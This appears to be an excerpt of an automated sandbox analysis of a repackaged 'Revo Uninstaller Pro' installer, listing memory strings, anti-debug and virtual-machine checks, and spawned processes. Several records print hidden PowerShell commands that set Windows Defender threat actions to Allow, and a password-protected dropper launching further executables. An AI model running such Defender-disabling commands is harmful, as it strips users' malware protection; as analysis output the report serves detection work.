      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.13B6B1C7F-7E70-4965-85B0-609252867B2B6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0689E1E35-CD38-45EF-BFC1-A207A94A6E356.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A2AFD234-28B3-4674-A5D0-0B0F6506EE226.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Fusion PC Migration AgentVMware, Inc.5.1C9EDBF7C-FAE6-5B7D-2D8E-F409BAB3C59A6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1B0C15D57-1F93-4986-808F-710FFB0686A96.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.16.064C6F385-E0E0-B5AE-819C-253D7C606A4210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files (x86)\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files (x86)\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare detected
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E5D4C4C9-3710-4149-AA8D-BB54149B73B46.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.102C9828F-B700-A8CA-EA5C-C07D973B2D8910.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4EC80F048-95D4-4F72-B498-C2CF528E52036.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1367FB481-70A4-2BD9-D89F-D204ADA9525A6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ACB5A703-699E-4EC4-8293-F79DB759E87E6.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.15546167B-7BB3-4E63-9071-5AE0E2FEC1E66.3
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1930AC8C3-2482-4219-AAB4-6EC8F4F28D586.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000A97000.00000002.00000001.01000000.0000000F.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: RunsOnVirtualMachine
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: VBoxService.exe
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.05960DB4E-29FC-438D-8C4A-D210BB57687110.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1555EAE6D-8547-4704-B511-DE16BE0A88CF6.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1452FEA7E-D933-41A7-9E0A-BFFEB327C2F410.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files (x86)\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E0F86B18-CDF6-4CD1-BC30-47D14A43766F10.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ADE47139-1A57-4F07-B628-BF198A9B846210.0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | API call chain: ExitProcess graph end node | graph_0-3986
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | API call chain: ExitProcess graph end node | graph_16-23543
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | API call chain: ExitProcess graph end node | graph_26-3638
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 16_2_00FEE4F5
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FF6AF3 mov eax, dword ptr fs:[00000030h] | 16_2_00FF6AF3
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FFACA1 GetProcessHeap, | 16_2_00FFACA1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 16_2_00FEE4F5
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEE643 SetUnhandledExceptionFilter, | 16_2_00FEE643
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FEE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 16_2_00FEE7FB
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00FF7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 16_2_00FF7BE1
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
      Source: C:\Windows\System32\runonce.exe | Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Downloads\OperaSetup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --silent --allusers=0 --server-tracking-blob=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
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Downloads\OperaSetup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --silent --allusers=0 --server-tracking-blob=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
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe c:\users\user\appdata\local\temp\7zscae7b8aa\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BSYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman
